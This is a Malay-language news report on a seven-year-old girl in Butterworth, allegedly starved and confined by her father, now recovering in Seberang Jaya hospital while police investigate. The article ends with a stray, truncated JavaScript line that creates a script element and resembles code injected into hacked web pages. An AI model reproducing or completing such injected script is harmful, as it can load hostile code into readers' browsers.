Oleh: ZAINULFAQAR YAACOB
SEBERANG JAYA – Mangsa penderaan terbaru membabitkan kanak-kanak perempuan berusia tujuh tahun di Butterworth kemungkinan akan melalui rawatan pemulihan yang panjang di Hospital Seberang Jaya, dengan pemantauan Jabatan Kebajikan Masyarakat (JKM).
Demikian kata Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin semasa melawat kanak-kanak terbabit, yang dikatakan menjadi mangsa penderaan ayahnya sendiri.
“Saya dimaklumkan kanak-kanak ini sudah boleh menjamah makanan mudah hadam.
“Sekarang, doktor yang merawatnya sedang memberi tumpuan pada memulihkan semula bukan sahaja keadaan fizikalnya, malah, mental dan emosi beliau selepas pengalaman yang sukar ini.
“Saya melihat keadaannya semakin stabil, tetapi kita pun tak tahu tempoh sepanjang mana terbaik untuk kanak-kanak ini semakin pulih,” ujarnya yang juga Ahli Dewan Undangan Negeri (ADUN) Seberang Jaya selepas mengadakan lawatan khas terhadap kanak-kanak terbabit di sini baru-baru ini.
Menurut Afif, kes tersebut memberi pengajaran kepada semua bahawa pripenting masyarakat serta guru-guru mengambil peduli hal kanak-kanak yang dekat dengan kehidupan mereka masing-masing.
“Inilah pentingnya peranan guru-guru dan masyarakat dalam bekerjasama dengan polis agar kes penderaan cepat ditangani bersama,” tegas beliau.
Ketua Polis Daerah (OCPD) Seberang Perai Utara, Asisten Komisioner Abdul Rahman Ibrahim bersama-sama badan kebajikan polis negeri turut menyertai lawatan tersebut.
Hadir sama, bekas Ahli Majlis bagi Majlis Perbandaran Seberang Perai (MPSP), Abdul Jalil Che Ros.
Pada sidang media berasingan, Abdul Rahman tidak menolak kemungkinan bahawa kanak-kanak berkenaan menerima penderaan ayah kandungnya di sebuah rumah flat di sini sejak November tahun lepas.
“Kita masih menunggu laporan perubatan rasmi, hasil siasatan kita (Polis Di-raja Malaysia, PDRM) dengan bantuan guru dan jiran-jiran, kita percaya kanak-kanak ini didera oleh ayah kandungnya sendiri.
“Berat mangsa sekarang sudah meningkat ke 10 kilogram, berdasarkan keadaan fizikal dengan saiz serta berat badannya lapan kilogram sebelum ini, kita percaya kanak-kanak ini dikurung tanpa makan dan minum yang sempurna sejak dua bulan lepas,” jelas beliau kepada wartawan.
Tambah beliau, ibu tiri kepada mangsa dera masih ditahan untuk membantu siasatan polis.
Walaupun kanak-kanak berkenaan sudah boleh menjamah makanan mudah hadam, Abdul Rahman memberitahu bahawa kemungkinan mangsa masih trauma dikurung dalam rumah yang langsung tidak dilengkapi bekalan air dan elektrik.
var d=document;var s=d.createElement(‘script’);